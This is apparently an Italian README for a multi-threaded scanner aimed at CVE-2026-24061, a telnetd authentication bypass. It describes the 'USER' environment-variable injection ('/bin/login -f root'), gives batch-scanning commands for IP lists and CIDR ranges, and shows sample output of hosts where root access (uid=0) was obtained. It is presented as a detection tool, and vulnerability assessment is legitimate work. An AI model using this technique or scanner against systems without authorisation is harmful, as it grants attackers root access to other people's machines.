
GNU Inetutils telnet vulnerabilità di bypass dell'autenticazione remota (CVE-2026-24061), questa vulnerabilità deriva da una gestione impropria delle variabili d'ambiente nel componente telnetd di GNU Inetutils. Un attaccante può sfruttare questa vulnerabilità costruendo una variabile d'ambiente USER maliziosa e inviandola al servizio telnet interessato, attivando il meccanismo di bypass dell'autenticazione, ottenendo così direttamente i privilegi di root senza password.
Questo è uno strumento di rilevamento avanzato per la vulnerabilità di bypass dell'autenticazione GNU Inetutils Telnetd (CVE-2026-24061). La vulnerabilità ha un punteggio CVSS di 9.8; gli attaccanti possono ottenere privilegi di root senza autenticazione tramite l'iniezione di variabili d'ambiente.
# Supporto colori su Windows
pip install colorama
python3 CVE-2026-24061.py 192.168.1.1
# Crea il file dei target
echo "192.168.1.1" > targets.txt
echo "192.168.1.2" >> targets.txt
echo "192.168.1.3" >> targets.txt
# Esegui il rilevamento batch
python3 CVE-2026-24061.py -f targets.txt
# Specifica porta e numero di thread
python3 CVE-2026-24061.py -f targets.txt -p 23 -t 50
# Modalità dettagliata e salvataggio dei risultati
python3 CVE-2026-24061.py -f targets.txt -o results.txt -v
# Timeout personalizzato
python3 CVE-2026-24061.py -f targets.txt -T 10
| Stato | Indicatore | Colore | Descrizione |
|---|---|---|---|
| Vulnerabilità confermata | ✓ | 🔴 Rosso | Rilevati sia uid=0 che gid=0 |
| Altamente sospetto | ⚠ | 🟡 Giallo | Rilevati uid=0 e utente root |
| Da confermare | ? | 🔵 Ciano | Rilevato solo uid=0, richiede verifica manuale |
| Sicuro | ✗ | 🟢 Verde | Nessuna caratteristica di vulnerabilità rilevata |
| Errore di connessione | ✗ | ⚪ Grigio | Problema di connessione di rete |
[✓ Vulnerabilità confermata] [14:30:25] 192.168.1.1:23 └─ Vulnerabilità confermata | uid=0/gid=0 | Banner: Ubuntu 20.04
[⚠ Altamente sospetto] [14:30:26] 192.168.1.2:23 └─ Altamente sospetto | uid=0 + root | Banner: Debian 12
[? Da confermare] [14:30:27] 192.168.1.3:23 └─ Rilevato uid=0 ma mancano altre condizioni di conferma
| Parametro | Abbreviazione | Valore predefinito | Descrizione |
|---|---|---|---|
--file | -f | - | Percorso del file dei target |
--port | -p | 23 | Porta di destinazione |
--threads | -t | 50 | Numero di thread concorrenti |
--timeout | -T | 8 | Timeout per singolo target (secondi) |
--output | -o | - | File di output dei risultati |
--verbose | -v | False | Modalità di output dettagliata |
--user | -u | root | Nome utente per l'autenticazione |
Il file dei target supporta i seguenti formati: 192.168.1.1 192.168.1.2:2323 # Porta specificata 192.168.1.0/24 # Formato CIDR 10.0.0.1-10.0.0.10 # Intervallo IP
Questa vulnerabilità sfrutta la gestione impropria delle variabili d'ambiente da parte di GNU Inetutils Telnetd:
/bin/login -f root# Condizioni di rilevamento multiple
uid_0_detected = "uid=0" in response_text
gid_0_detected = "gid=0" in response_text
root_detected = "root" in response_text
# Logica di conferma della vulnerabilità
if uid_0_detected and gid_0_detected:
return "Vulnerabilità confermata"
elif uid_0_detected and root_detected:
return "Altamente sospetto"
elif uid_0_detected:
return "Da confermare"
·


